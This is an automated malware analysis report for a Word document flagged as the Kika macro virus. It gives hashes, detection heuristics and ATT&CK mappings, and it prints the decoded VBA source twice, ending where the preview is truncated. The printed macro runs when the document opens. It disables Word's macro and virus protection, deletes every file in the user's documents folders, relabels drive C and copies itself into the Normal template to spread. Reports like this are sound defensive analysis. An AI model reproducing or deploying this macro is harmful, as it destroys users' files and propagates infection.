Office (OLE) malware analysis — malicious · 5fa1f7a0b8456509

MALICIOUS

Office (OLE)

43.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 5bceb2793bc89e55508df27441c241b7 SHA-1: f2c9e4d3f97ec484463494af1c2a44a48bf5becf SHA-256: 5fa1f7a0b84565093be4a0dbddc9ee67bb78104c4dad626750bd06914539de9a

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The critical OLE_VBA_SHELL heuristic indicates the presence of a Shell() call within the VBA macros. The Document_Open macro is configured to execute automatically, and it attempts to disable security features and delete files. The ClamAV detection 'Doc.Trojan.Kika-1' further supports the malicious nature of the file. The macro also attempts to clear existing code and rename components, suggesting a self-propagation or obfuscation mechanism.

Heuristics 5

ClamAV: Doc.Trojan.Kika-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Kika-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6023 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6023 bytes
SHA-256: `2490837dfbf29698cfd9dd2cc45b3e1dff58984a9b7b5ae6cc326329c48abf0d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "KIKA" Attribute VB_Base = "1Normal.KIKA" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Application.ShowVisualBasicEditor = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\security", "Level") = 1& CommandBars("Tools").Controls("Macro").Visible = False Options.VirusProtection = (1 - 1) Options.ConfirmConversions = (1 - 1) Options.SaveNormalPrompt = False Application.EnableCancelKey = wdCancelDisabled If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\", "kikaviruz") <> "by BAMBAM" Then Kill ("c:\Mis documentos\.") Kill ("C:\My documents\.") End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\", "kikaviruz") = "by BAMBAM" Set FRED = ActiveDocument.VBProject.VBComponents.Item(1) Set PETER = NormalTemplate.VBProject.VBComponents.Item(1) Shell ("LABEL C: KIKA"), vbMinimizedNoFocus BETY = PETER.Codemodule.CountOFlines BILMA = FRED.Codemodule.CountOFlines bambam = 2 If FRED.Name <> "KIKA" Then If BILMA > 0 Then FRED.Codemodule.Deletelines 1, BILMA Set Ainfectar = FRED FRED.Name = "KIKA" hacerAD = True PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 26))) End If If PETER.Name <> "KIKA" Then If BETY > 0 Then PETER.Codemodule.Deletelines 1, BETY Set Ainfectar = PETER PETER.Name = "KIKA" hacerNT = True PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 22))) End If If hacerNT <> True And hacerAD <> True Then GoTo byebye If hacerNT = True Then Do While FRED.Codemodule.Lines(1, 1) = "" FRED.Codemodule.Deletelines 1 PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 22))) Loop Ainfectar.Codemodule.AddFromstring ("Private Sub Document_Close()") Do While FRED.Codemodule.Lines(bambam, 1) <> "" Ainfectar.Codemodule.insertlines bambam, FRED.Codemodule.Lines(bambam, 1) bambam = bambam + 1 Loop bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("Sub ViewVbCode()") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("MsgBox ") + (Chr(34) + "Its KIKA VIRUZ Ja,ja,ja... : )" + Chr(34)) + "," + "vbokoNLY," + Chr(34) + "Alt-F11 hmmm..." + Chr(34) bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("End Sub") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("Sub HelpAbout()") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("MsgBox ") + ((Chr(34) + "Sorry " + (Chr(34)) + "+" + "Application.UserName" + "+" + (Chr(34)) + ", but... you have KIKA VIRUZ by BAMBAM. (c)copywrong. " + Chr(34))) bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("End sub") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("Sub ToolsMacro()") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("MsgBox") + (Chr(34)) + "I know you " + (Chr(34) + "+" + "application.username" + "+" + Chr(34) + " and i'm observing you " + Chr(34)) bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("End Sub") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("Sub FileTemplates()") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("End Sub ") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("Sub help()") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("On error resume next") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, ("Assistant.Visible = True") bambam = bambam + 1 Ainfectar.Codemodule.insertlines bambam, (" With Assistant.NewBalloon") ... (truncated)

SHA-256: 2490837dfbf29698cfd9dd2cc45b3e1dff58984a9b7b5ae6cc326329c48abf0d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "KIKA"
Attribute VB_Base = "1Normal.KIKA"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.ShowVisualBasicEditor = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Visible = False
Options.VirusProtection = (1 - 1)
Options.ConfirmConversions = (1 - 1)
Options.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\", "kikaviruz") <> "by BAMBAM" Then
Kill ("c:\Mis documentos\*.*")
Kill ("C:\My documents\*.*")
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\", "kikaviruz") = "by BAMBAM"
Set FRED = ActiveDocument.VBProject.VBComponents.Item(1)
Set PETER = NormalTemplate.VBProject.VBComponents.Item(1)
Shell ("LABEL C: KIKA"), vbMinimizedNoFocus
BETY = PETER.Codemodule.CountOFlines
BILMA = FRED.Codemodule.CountOFlines
bambam = 2
If FRED.Name <> "KIKA" Then
 If BILMA > 0 Then FRED.Codemodule.Deletelines 1, BILMA
    Set Ainfectar = FRED
    FRED.Name = "KIKA"
    hacerAD = True
    PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 26)))
End If
If PETER.Name <> "KIKA" Then
If BETY > 0 Then PETER.Codemodule.Deletelines 1, BETY
     Set Ainfectar = PETER
     PETER.Name = "KIKA"
     hacerNT = True
     PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 22)))
End If
If hacerNT <> True And hacerAD <> True Then GoTo byebye
 If hacerNT = True Then
Do While FRED.Codemodule.Lines(1, 1) = ""
  FRED.Codemodule.Deletelines 1
  PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 22)))
 Loop
 Ainfectar.Codemodule.AddFromstring ("Private Sub Document_Close()")
 Do While FRED.Codemodule.Lines(bambam, 1) <> ""
   Ainfectar.Codemodule.insertlines bambam, FRED.Codemodule.Lines(bambam, 1)
   bambam = bambam + 1
Loop
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Sub ViewVbCode()")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("MsgBox ") + (Chr(34) + "Its KIKA VIRUZ    Ja,ja,ja...  : )" + Chr(34)) + "," + "vbokoNLY," + Chr(34) + "Alt-F11  hmmm..." + Chr(34)
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("End Sub")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Sub HelpAbout()")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("MsgBox ") + ((Chr(34) + "Sorry " + (Chr(34)) + "+" + "Application.UserName" + "+" + (Chr(34)) + ", but... you have KIKA VIRUZ by BAMBAM. (c)copywrong. " + Chr(34)))
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("End sub")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Sub ToolsMacro()")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("MsgBox") + (Chr(34)) + "I know you  " + (Chr(34) + "+" + "application.username" + "+" + Chr(34) + " and i'm observing you " + Chr(34))
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("End Sub")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Sub FileTemplates()")
bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("End Sub ")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Sub help()")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("On error resume next")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, ("Assistant.Visible = True")
 bambam = bambam + 1
 Ainfectar.Codemodule.insertlines bambam, (" With Assistant.NewBalloon")
 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.